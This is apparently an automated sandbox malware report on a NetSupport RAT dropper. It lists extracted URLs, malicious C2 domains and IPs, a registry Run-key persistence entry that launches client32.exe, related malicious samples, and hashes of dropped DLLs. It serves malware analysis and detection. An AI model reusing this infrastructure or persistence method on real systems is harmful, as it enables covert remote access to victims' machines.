https://sectigo.com/CPS0D | powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.macrovision.com0 | KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geo.netsupportsoftware.com/location/loca.aspu | client32.exe, 00000007.00000002.4095147957.000000000082A000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.netsupportschool.com/tutor-assistant.asp11( | client32.exe, 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034732030.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2118509299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.1912534174.00000000045D1000.00000004.00000800.00020000.00000000.sdmp | false
                                                                                                      high
                                                                                                      http://www.netsupportschool.com/tutor-assistant.aspclient32.exe, 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034732030.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2118509299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpfalse
                                                                                                        high
                                                                                                        http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1923156190.0000000006038000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.pci.co.uk/supportclient32.exe, 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034732030.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2118509299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpfalse
                                                                                                            high
                                                                                                            https://sectigo.com/CPS0powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1912534174.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://ocsp.thawte.com0KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://xml.org/sax/features/namespacesis-0LL3Q.tmp.1.drfalse
                                                                                                                        high
                                                                                                                        https://contoso.com/Iconpowershell.exe, 00000003.00000002.1923156190.0000000006038000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.radmin.comKC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0spowershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://geo.netsupportsoftware.com/location/loca.asp3fclient32.exe, 00000007.00000002.4096405851.00000000051C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://127.0.0.1client32.exe, client32.exe, 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://www.symauth.com/cps0(KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.drfalse
                                                                                                                                    high
                                                                                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tpowershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.advanced-ip-scanner.com0KC0uZWwr8p.tmp, 00000001.00000002.1996182111.00000000010EC000.00000004.00000010.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, is-0LL3Q.tmp.1.dr, is-MH1O8.tmp.1.dr, is-BPHN2.tmp.1.drfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0ypowershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://www.symauth.com/rpa00KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.drfalse
                                                                                                                                            high
                                                                                                                                            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#powershell.exe, 00000003.00000002.1912534174.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://qt-project.org/xml/features/report-start-end-entityis-0LL3Q.tmp.1.drfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1912534174.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1912534174.0000000004726000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://trolltech.com/xml/features/report-start-end-entityis-0LL3Q.tmp.1.drfalse
                                                                                                                                                    high
                                                                                                                                                    http://geo.netsupportsoftware.com/location/loca.aspFzclient32.exe, 00000007.00000002.4096405851.00000000051C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://trolltech.com/xml/features/report-whitespace-only-CharDatais-0LL3Q.tmp.1.drfalse
                                                                                                                                                        high
                                                                                                                                                        http://geo.netsupportsoftware.com/location/loca.aspNxclient32.exe, 00000007.00000002.4096405851.00000000051C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
IP | Domain | Country | ASN | ASN Name | Malicious
151.236.16.15 | payiki.com | European Union | 29802 | HVC-ASUS | true
104.26.0.231 | geo.netsupportsoftware.com | United States | 13335 | CLOUDFLARENETUS | false
199.188.200.195 | anyhowdo.com | United States | 22612 | NAMECHEAP-NETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1552424
Start date and time: 2024-11-08 19:01:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 33s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: KC0uZWwr8p.exe (renamed because the original name is a hash value)
Original Sample Name: 7b6e6212a6d13800282bd2cb362c2a311d89e543.exe
Detection: MAL
Classification: mal60.rans.spre.troj.evad.winEXE@10/299@3/3
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 70%
• Number of executed functions: 186
• Number of non-executed functions: 201
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 5448 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code
• Report size getting too big, too many NtCreateKey calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtSetInformationFile calls found
• VT rate limit hit for: KC0uZWwr8p.exe
Time | Type | Description
13:02:21 | API Interceptor | 17x Sleep call for process: powershell.exe modified
13:02:54 | API Interceptor | 14609360x Sleep call for process: client32.exe modified
18:02:28 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\SystemUtil\client32.exe
18:02:36 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\SystemUtil\client32.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
151.236.16.15 | CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | http://151.236.16.15/fakeurl.htm
151.236.16.15 | CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | http://151.236.16.15/fakeurl.htm
151.236.16.15 | CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | http://151.236.16.15/fakeurl.htm
151.236.16.15 | CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | http://151.236.16.15/fakeurl.htm
151.236.16.15 | Advanced_IP_Scanner_2.5.4594.12.exe | malicious | NetSupport RAT, NetSupport Downloader | http://151.236.16.15/fakeurl.htm
151.236.16.15 | Advanced_IP_Scanner_2.5.4594.12.exe | malicious | NetSupport RAT, NetSupport Downloader | http://151.236.16.15/fakeurl.htm
151.236.16.15 | https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | http://151.236.16.15/fakeurl.htm
104.26.0.231 | hkpqXovZtS.exe | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
104.26.0.231 | file.exe | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
104.26.0.231 | qvoLvRpRbr.msi | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
104.26.0.231 | EMX97rT0GX.msi | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
104.26.0.231 | Support_auto.msi | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                          SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                          SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                          information_package.exeGet hashmaliciousNetSupport RAT, NetSupport Downloader, Stealc, VidarBrowse
                                                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                          updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                          updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                          • geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                          199.188.200.195CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • http://199.188.200.195/fakeurl.htm
                                                                                                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • http://199.188.200.195/fakeurl.htm
                                                                                                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • http://199.188.200.195/fakeurl.htm
                                                                                                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • http://199.188.200.195/fakeurl.htm
                                                                                                                                                          Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • http://199.188.200.195/fakeurl.htm
                                                                                                                                                          Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • http://199.188.200.195/fakeurl.htm
                                                                                                                                                          https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                                                          • http://199.188.200.195/fakeurl.htm
Match / Associated Sample Name / URL | Detection | Threat Name | Context
geo.netsupportsoftware.com
  72BF1aHUKl.msi | malicious | NetSupport RAT | 172.67.68.212
  hkpqXovZtS.exe | malicious | NetSupport RAT | 104.26.0.231
  file.exe | malicious | NetSupport RAT | 104.26.1.231
  file.exe | malicious | NetSupport RAT | 104.26.1.231
  CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | 172.67.68.212
  CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | 172.67.68.212
  CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | 172.67.68.212
  CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | 104.26.1.231
  Advanced_IP_Scanner_2.5.4594.12.exe | malicious | NetSupport RAT, NetSupport Downloader | 104.26.1.231
  Advanced_IP_Scanner_2.5.4594.12.exe | malicious | NetSupport RAT, NetSupport Downloader | 104.26.1.231
payiki.com
  CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | 151.236.16.15
  CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | 151.236.16.15
  CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | 151.236.16.15
  CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | 151.236.16.15
  Advanced_IP_Scanner_2.5.4594.12.exe | malicious | NetSupport RAT, NetSupport Downloader | 151.236.16.15
  Advanced_IP_Scanner_2.5.4594.12.exe | malicious | NetSupport RAT, NetSupport Downloader | 151.236.16.15
  https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | 151.236.16.15
anyhowdo.com
  CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | 199.188.200.195
  CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | 199.188.200.195
  CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | 199.188.200.195
  CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | 199.188.200.195
  Advanced_IP_Scanner_2.5.4594.12.exe | malicious | NetSupport RAT, NetSupport Downloader | 199.188.200.195
  Advanced_IP_Scanner_2.5.4594.12.exe | malicious | NetSupport RAT, NetSupport Downloader | 199.188.200.195
  https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | 199.188.200.195
Match / Associated Sample Name / URL | Detection | Threat Name | Context
NAMECHEAP-NETUS
  Play-Audio_Vmail_Ach Statement Credi....html | malicious | HtmlDropper | 199.188.200.234
  Play_VM_00_01_22sec-ATT212monika.hayward@bostonbeer.com.html | malicious | EvilProxy, HTMLPhisher | 162.0.238.119
  xxTupY4Fr3.xlsx | malicious | Unknown | 63.250.43.10
  RO2Y11yOJ7.exe | malicious | FormBook | 192.64.118.221
  https://login-zendesk-account.servz.com.pk | malicious | HTMLPhisher | 63.250.47.132
  https://login-zendesk-account.servz.com.pk | malicious | HTMLPhisher | 63.250.47.132
  https://login-zendesk-account.servz.com.pk | malicious | HTMLPhisher | 63.250.47.132
  xBzBOQwywT.exe | malicious | FormBook | 199.192.19.19
  https://google.com:login@login-zendesk-account.servz.com.pk/index.html | malicious | HTMLPhisher | 63.250.47.132
HVC-ASUS
  Payload 94.75 (3).225.exe | malicious | Unknown | 104.254.128.202
  CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | 151.236.16.15
  CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | 151.236.16.15
  CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | 151.236.16.15
  CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | 151.236.16.15
  Advanced_IP_Scanner_2.5.4594.12.exe | malicious | NetSupport RAT, NetSupport Downloader | 151.236.16.15
  Advanced_IP_Scanner_2.5.4594.12.exe | malicious | NetSupport RAT, NetSupport Downloader | 151.236.16.15
  https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader | 151.236.16.15
  PO-33463334788.exe | malicious | Remcos, GuLoader | 23.227.202.197
  IGNM2810202400017701_270620240801_546001.vbs | malicious | GuLoader | 66.206.22.19
CLOUDFLARENETUS
  72BF1aHUKl.msi | malicious | NetSupport RAT | 172.67.68.212
  https://nleco-my.sharepoint.com/:u:/p/smartin/EYZSur4py4xKna-WAI8lgIkBS_KVLZwaA2d1wGxZA5Gdvw?e=wwT7sT | malicious | HtmlDropper, HTMLPhisher | 104.18.95.41
  file.exe | malicious | LummaC | 188.114.97.3
  pago de PEDIDO PROFORMA.exe | malicious | AgentTesla | 104.26.12.205
  file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 188.114.96.3
  file.exe | malicious | LummaC | 188.114.96.3
  file.exe | malicious | Amadey, Stealc, Vidar | 172.64.41.3
  file.exe | malicious | LummaC, Stealc | 188.114.96.3
  http://jobs.sixlfags.com | malicious | Unknown | 104.21.43.150
  https://ascerta.aha.io/shared/edaa0f8ea0ea06d13e545667a40fae36 | malicious | Unknown | 104.18.94.41
No context
Match / Associated Sample Name / URL | Detection | Threat Name
C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)
  Advanced_IP_Scanner_2.5.4594.12.exe | malicious | NetSupport RAT, NetSupport Downloader
  Advanced_IP_Scanner_2.5.4594.12.exe | malicious | NetSupport RAT, NetSupport Downloader
  https://download.advanced-ip-scanner.com/download/files/Advanced_IP_Scanner_2.5.4594.1.exe | malicious | Unknown
  Advanced Scanner.exe | malicious | NetSupport RAT, NetSupport Downloader
  ip_scan_en_us_Release_2.5.4594.1.msi | malicious | CobaltStrike
  ipscan.msi | malicious | Darkgate
  Advanced_IP_Scanner.exe | malicious | DanaBot
  Advanced_IP_Scanner.exe | malicious | DanaBot
  IPAVSCAN_win_version_1.1.3.msi | malicious | Unknown
  Advanced_IP_Scanner_2.5.4594.1_net.exe | malicious | Unknown
C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)
  Advanced_IP_Scanner_2.5.4594.12.exe | malicious | NetSupport RAT, NetSupport Downloader
  Advanced_IP_Scanner_2.5.4594.12.exe | malicious | NetSupport RAT, NetSupport Downloader
  https://download.advanced-ip-scanner.com/download/files/Advanced_IP_Scanner_2.5.4594.1.exe | malicious | Unknown
  Advanced Scanner.exe | malicious | NetSupport RAT, NetSupport Downloader
  ip_scan_en_us_Release_2.5.4594.1.msi | malicious | CobaltStrike
  ipscan.msi | malicious | Darkgate
  Advanced_IP_Scanner.exe | malicious | DanaBot
  Advanced_IP_Scanner.exe | malicious | DanaBot
  IPAVSCAN_win_version_1.1.3.msi | malicious | Unknown
                                                                                                                                                                                                Advanced_IP_Scanner_2.5.4594.1_net.exeGet hashmaliciousUnknownBrowse
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:MS Windows icon resource - 9 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
Category:dropped
Size (bytes):25214
Entropy (8bit):5.181706176676903
Encrypted:false
SSDEEP:192:gZwwfjXDaFoDU90fQNBYNK30CCl77nQ6jtCuZEaaX/bv+NZmQDtLQIRLdc8ZDeO4:qLXDTQCQNmNa0CCl77nQ6viv6t2tMA
MD5:3511FCBA762713FBC4D83979F300A383
SHA1:61C33483A70C253FF38222021AD05E599F11E05C
SHA-256:AD6B11E0F7B0E9DDD0B3440AA0C9308F18E385C7EBB78452A964F77A104B789E
SHA-512:2CA49AE53A97FDD8AA857DFFFF281501506BAC8BD6B0D76B94CDA65592492A7DAA29FEC2CFD912DDBDCDEDEFF104BD21B00B2DED958C8BA7567536AFABE4D639
Malicious:false
Reputation:low
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):5987880
Entropy (8bit):6.645849589307296
Encrypted:false
SSDEEP:98304:I9HgaLmICbZhV8cBfAVG4F40zkpEJsv6tWKFdu9CcDo+fN4A:I9Hgaq5b7OcBfAVG4FiEJsv6tWKFdu9V
MD5:C2BB94B2C229ECE69D865B1898C71324
SHA1:AFAC1A2FEDE68AD129BB48B01ED8B80997F75D2F
SHA-256:193814D47E0B7917C3373011F64CD3AC649A16D1D0515C9D409FA1794C5BFFB1
SHA-512:2CB31EB8FD866510268553B77D2BB4DDFFB4D48F22C35B8679933CB48AC7B90DE1AEFCF6132DBCEF007F6F622869C931BE13A5D41234E49E0C7DB3F8C5CF8B0A
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious
• Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious
• Filename: , Detection: malicious
• Filename: Advanced Scanner.exe, Detection: malicious
• Filename: ip_scan_en_us_Release_2.5.4594.1.msi, Detection: malicious
• Filename: ipscan.msi, Detection: malicious
• Filename: Advanced_IP_Scanner.exe, Detection: malicious
• Filename: Advanced_IP_Scanner.exe, Detection: malicious
• Filename: IPAVSCAN_win_version_1.1.3.msi, Detection: malicious
• Filename: Advanced_IP_Scanner_2.5.4594.1_net.exe, Detection: malicious
Reputation:moderate, very likely benign file
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):6708264
Entropy (8bit):6.661851136227646
Encrypted:false
SSDEEP:98304:YMm4f0AN5rHUQ+P2DkVNYVBcE7hxc5Rar3v:Yb4fzN5rHUj+D5VBckhkRGv
MD5:1FBE59E9BE0F445BB14BE02C0EE69D6F
SHA1:98F62A873CA78E9BE7760DE0FDDEDC56FAE2505D
SHA-256:F201494B5EBE609FF2CA7D36275B19AB645C81153417B5FF4852AD8E164E144D
SHA-512:00A61EB5B7B412CFF8BB92157DD2330FC7729C23E82A6C9648C067581DDF91E0743EC5CF4B3D4D59EA49C7EDCDA63DBF39350A173A354EC465E3F5A5D087F24F
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious
• Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious
• Filename: , Detection: malicious
• Filename: Advanced Scanner.exe, Detection: malicious
• Filename: ip_scan_en_us_Release_2.5.4594.1.msi, Detection: malicious
• Filename: ipscan.msi, Detection: malicious
• Filename: Advanced_IP_Scanner.exe, Detection: malicious
• Filename: Advanced_IP_Scanner.exe, Detection: malicious
• Filename: IPAVSCAN_win_version_1.1.3.msi, Detection: malicious
• Filename: Advanced_IP_Scanner_2.5.4594.1_net.exe, Detection: malicious
Reputation:moderate, very likely benign file
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1151016
Entropy (8bit):6.482547207070433
Encrypted:false
SSDEEP:24576:Ql4zuvU31UisunBgeZaGKYbmYccwy9v5nOUhqJEe:Ql4q8lUd2z3mYVBb8H
MD5:ED04DAB88E70661E4980A284B0DF6A0C
SHA1:C1499360A68FDC12013A6CBB35C05A3098E95F41
SHA-256:9AFF2CCBD77806D7828CE99481104515FA34859499C0A17FFE4785DE44E0A2F9
SHA-512:E2B41A7A80216ECC9ADDE467E9DA84C39A4C593C0D3928442C0AC079F8D854A3605DF9E93A1408C0042F5C4D2A41CBBA281BBBB3524F5BE8F4E5DAFEA048E87A
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):327208
Entropy (8bit):6.804582730583226
Encrypted:false
SSDEEP:6144:zqg47yYJkKxQ8WVauJIg9FzQGRPvhUhcD3I95HIbPSRyuoboXHcJ2ZWa3Imr1y6a:LgTxQ3UuJIg9FzQGRPvlf
MD5:72B2E7A9AF236E5CA0C27107E8C5690C
SHA1:6AC273911118C7CAA71818C55E22D27B4C36B843
SHA-256:725DD45CF413D669D22FD38BAFFB5296BD2FEC4C0379A1FA3ABA4CC12C41768A
SHA-512:C4D217EB21501E1A26AFA5A6CB5B53152F6330A96A58B83709BE2C615594E1D640DD65E5353AD8CD2E7E3B4EABBB8E3AFF0F5D13D5577A1CCC05B590CC9803B6
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):5735464
Entropy (8bit):6.639119541918398
Encrypted:false
SSDEEP:49152:hQQeqQ4ZHCscH74ar0+qrlOjvuzu7mA4a59KEyhRO6LyUfqcVeaXafSKHZV+gZtK:hzeqxHCTf4+qwGLW9sRO6XW+I9ipjN
MD5:41C0478595550900E33B52B8CDBEDEAA
SHA1:0550C6434EF71260D3581CE2A90F080DE93E01D6
SHA-256:44E495DE09B59E66FDF0C1C65A2070A4CE95BAAF4169C875DEA0590BD37342BD
SHA-512:9302EDB0DE46E0F132271532140F19D1C3B9DCE0D1F11046148E6DC81C689A07256928839FF0D64708A718004E1F216BE0F64C5C9B05CC1C612B6E0E71CC442D
Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q...}...}...}.......}.......}.......}.......}.......}.......}..N....}...}..cp......}.......}....y..}...}...}.......}..Rich.}..........................PE..L.....%^...........!.....H>..J.......J>......`>....e..........................W.....h.X...@..........................ZI.D...T.Q......0T..............hW.(....@T.....prH.T...................lsH......rH.@............`>.l5...........................text....F>......H>................. ..`.rdata...2...`>..4...L>.............@..@.data........S..Z....S.............@....rsrc........0T.......S.............@..@.reloc.......@T.......S.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):498216
                                                                                                                                                                                                  Entropy (8bit):6.392626000362742
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:lOssvQ+soy9eQdVgSTZuyvDTSVHyZ1Hy6:lsYvo4eQdKzW
                                                                                                                                                                                                  MD5:C80BA989BA52F73AD4332EA7B3BE0499
                                                                                                                                                                                                  SHA1:F4A2A70F2E23DB44AEC358F3DD282E68483AC631
                                                                                                                                                                                                  SHA-256:C86C36B20B602D6A063575136ECB417EB0A7AD8DDDBB966750FA348FEB74D309
